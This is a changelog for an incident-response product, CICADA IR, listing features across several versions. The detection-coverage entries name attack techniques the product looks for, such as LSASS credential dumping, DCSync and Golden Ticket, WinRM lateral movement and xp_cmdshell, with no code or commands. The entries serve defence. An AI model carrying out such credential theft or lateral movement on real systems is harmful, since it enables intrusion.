What's New

Release highlights for recent CICADA IR versions. Current version: 1.51.0

1.51.0

  • Improved investigation completion workflow — clearer status progression from collection through to final report
  • Enhanced licence key security with stronger activation signatures
  • Console banner improvements for VM startup

1.50.0

Feature gating, tiered reporting & community trial

  • Tiered reporting — Investigation reports (executive summary, technical, MITRE mapping, blast radius, attack path, AI-enhanced) available at Professional tier. Compliance & legal reports (NDB, insurance, legal hold, regulatory, client exposure, executive briefing, IR playbook, post-incident review) available at Enterprise tier.
  • Community trial — 14-day free trial with download link delivered by email. No credit card required.
  • Active Directory moved to the free tier — all users can now connect to on-prem AD out of the box.
  • Source connectors and LLM providers are now gated by tier — locked features show a clear disabled state with upgrade prompts.

1.49.0

Behavioral engine hardening

  • Major accuracy improvements to the deterministic behavioral scoring engine — fewer false positives from service accounts, SYSTEM log operations, and correlated weak signals.
  • PowerShell deobfuscation — detects encoded commands, backtick escapes, and character array obfuscation before pattern matching.
  • New detection patterns: WinRM lateral movement, slow-and-low brute force, slow lateral movement campaigns.
  • Validated against a 16-scenario test suite covering true positives, false positives, and evasion techniques.

1.48.0

Ubiquiti UCG firewall integration & source selection redesign

  • Ubiquiti UniFi Console Gateway integration — collect firewall logs, block/unblock IPs via CICADA-BLOCKLIST firewall group. Supports API key and session-based authentication.
  • Source selection at investigation creation — when creating a new investigation, you now choose which data sources to import upfront. No more sources appearing automatically.

1.47.0

Correlation engine & detection coverage expansion

  • Correlation engine — individual detections now aggregate into entity-level correlated findings. Risk-based alerting escalates severity when multiple MITRE tactics are observed for the same entity.
  • 12 attack chain templates — temporal sequence matching for common attack flows: credential dump → lateral movement, brute force → compromise, full kill chain, DCSync + Golden Ticket, ransomware precursors, and more.
  • 17 new Windows Event IDs — domain policy changes, Zerologon/Netlogon, LSASS dump via SilentProcessExit, PowerShell pipeline, MSSQL xp_cmdshell, BITS persistence, Credential Manager, and more.
  • Evidence Events tab — search by entity name to see all normalised evidence events where they appear as actor or target.
  • Improved Defender alert parsing — process command lines, URL evidence, and registry evidence now extracted from alerts.
  • Noise reduction — successful auth IPs no longer create spurious IOCs, SHA1/MD5 duplicates removed, system accounts filtered from blast radius.

For the full changelog including all bug fixes and technical details, contact support@cicada-ir.ai.